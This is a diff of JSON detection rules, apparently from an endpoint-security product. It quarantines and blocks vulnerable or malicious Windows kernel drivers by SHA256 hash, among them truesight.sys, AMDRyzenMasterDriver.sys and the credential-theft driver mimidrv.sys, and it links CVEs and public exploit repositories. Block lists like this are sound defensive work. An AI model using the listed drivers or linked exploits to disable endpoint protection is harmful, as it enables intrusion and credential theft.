+ "last_update": "2026-03-23T11:45:30.474502Z",
+ "creation_date": "2026-03-23T11:45:30.474505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e43be62587d7c4bb371bc0a1142a87a2a021bd0dcfd6cd107a50837c109e3ba",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73dc7e36-4871-53b0-bd8d-da5f2abe3746",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975467Z",
+ "creation_date": "2026-03-23T11:45:29.975471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b5153404fe836cf93237c50977cdb28a3bbd9663bdf63f5bfa26e65e1d00b3f",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ddf34d-96d9-5e29-a452-bf1fb213a85d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478830Z",
+ "creation_date": "2026-03-23T11:45:30.478833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6165491e8391eac9c0e3b9a2a31e1692a567c16cbfa36d7a88c401ffae1f6c63",
+ "comment": "Vulnerable Kernel Driver (aka asas.sys) [https://www.loldrivers.io/drivers/dbb58de1-a1e5-4c7f-8fe0-4033502b1c63/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73e12948-d6cf-587a-8eb2-0409c5c52eb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140782Z",
+ "creation_date": "2026-03-23T11:45:31.140784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef9485e039d30ff71e9894ec4bbe2efce32ca9ecf1bb919dffb5f6cebea00993",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ecfaf9-84ee-52b1-97ec-bec6a5c8a563",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820617Z",
+ "creation_date": "2026-03-23T11:45:30.820618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64dddd5ac53fe2c9de2b317c09034d1bccaf21d6c03ccfde3518e5aa3623dd66",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74094e0f-5873-58cd-afe2-daa8ac9540a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475379Z",
+ "creation_date": "2026-03-23T11:45:31.475383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb1dd60610ec06f02801006be2e9c4274d7ae3e6a3b17d6760f27f470d16d3ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "741bafce-1532-5559-96e6-328a42db91ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827017Z",
+ "creation_date": "2026-03-23T11:45:30.827019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27f8831c710ae2471f6c35d2311e690b36acc9d31d466b22ff7ffbfe1ef3ced8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "742a06af-a2f1-5a07-800e-16816dea1c63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610828Z",
+ "creation_date": "2026-03-23T11:45:29.610830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610836Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df0dcfb3971829af79629efd036b8e1c6e2127481b3644ccc6e2ddd387489a15",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "742e502b-88e4-5596-9cbd-b6f31ddd363d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156740Z",
+ "creation_date": "2026-03-23T11:45:31.156742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "643d283d908f4ac343a878d98b6477cbb6eba4424ca6ad85341e91237d288b06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7432fa8b-24e3-57c8-a2d1-4d7e41c7415e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822607Z",
+ "creation_date": "2026-03-23T11:45:31.822611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b37dbd665e83bb8554b6f46b1246bb8cac9dba98963b319a037cde6495b2ad71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "744cbc20-393c-5bf0-9d87-ddc23081795b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976010Z",
+ "creation_date": "2026-03-23T11:45:29.976012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01b9a38c08e8a143c2e51768bd6c227367d1502c090033beddec5a89f50ca4cd",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "744ddd60-3539-5e4f-a94c-3eac1b4afb1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160891Z",
+ "creation_date": "2026-03-23T11:45:31.160893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8a37ef69dbc56da1ffeb5cc8bb7bca2b2472513af7614ce7e562b0f92082540",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "745543b6-1ac7-515f-9cd3-af4350d7eec9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463978Z",
+ "creation_date": "2026-03-23T11:45:30.463981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74559025-6519-5942-9168-3de2542a624a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975184Z",
+ "creation_date": "2026-03-23T11:45:29.975186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff9623317287358440ec67da9ba79994d9b17b99ffdd709ec836478fe1fc22a5",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "745fe60c-3216-5e5a-918c-c6cc49284a1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609884Z",
+ "creation_date": "2026-03-23T11:45:29.609886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e291148da43ea6a491b8b94bdf573365087940c9b90f6a15a4e589da86a518d",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74741935-c3e3-5dd9-9e2f-58cd9cc0b340",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156690Z",
+ "creation_date": "2026-03-23T11:45:31.156691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "145c0df9b3bd1e84373cec313183eb7273048b861c3bdc46d23597ee8807a156",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74766a75-53cf-5cd3-9f99-eb7db319c3bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494692Z",
+ "creation_date": "2026-03-23T11:45:31.494694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2cec63897dd10f604a4485aacb062e1546be7cb4d787557f0b37eddcf1edd8a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74889480-071e-5974-b914-5878e9ab1680",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828561Z",
+ "creation_date": "2026-03-23T11:45:30.828563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd7bafa95c2e3dd217c40c03b3e5224daa6cf2b8969baaa9d7e3d90e172ea5e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7488e995-e400-5d91-be4b-376c9206c052",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475856Z",
+ "creation_date": "2026-03-23T11:45:30.475859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72b67b6b38f5e5447880447a55fead7f1de51ca37ae4a0c2b2f23a4cb7455f35",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7492167f-7ebd-517f-8108-6c45cb37ca1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818347Z",
+ "creation_date": "2026-03-23T11:45:30.818349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90574d2c406b9738aae8fc629c3983c5e47a6282a43b052f38b5dd313380c30a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7495af6f-44cf-549a-b65c-e2fb0bf836c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604664Z",
+ "creation_date": "2026-03-23T11:45:29.604666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a689804c4e6e9aa07d48f9c99b7a1be6b05cba1c632b1a083b8031f6e1651c28",
+ "comment": "Vulnerable Kernel Driver (aka mydrivers.sys) [https://www.loldrivers.io/drivers/d9e00cc7-a8f4-4390-a6dc-0f5423e97da4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74a4f858-1ec9-5461-b804-0cd57f1787be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977414Z",
+ "creation_date": "2026-03-23T11:45:29.977417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74b2309d-00f0-5038-a8de-206213123154",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156327Z",
+ "creation_date": "2026-03-23T11:45:31.156329Z",
+ "enabled": true,
+ "block_on_agent": true,
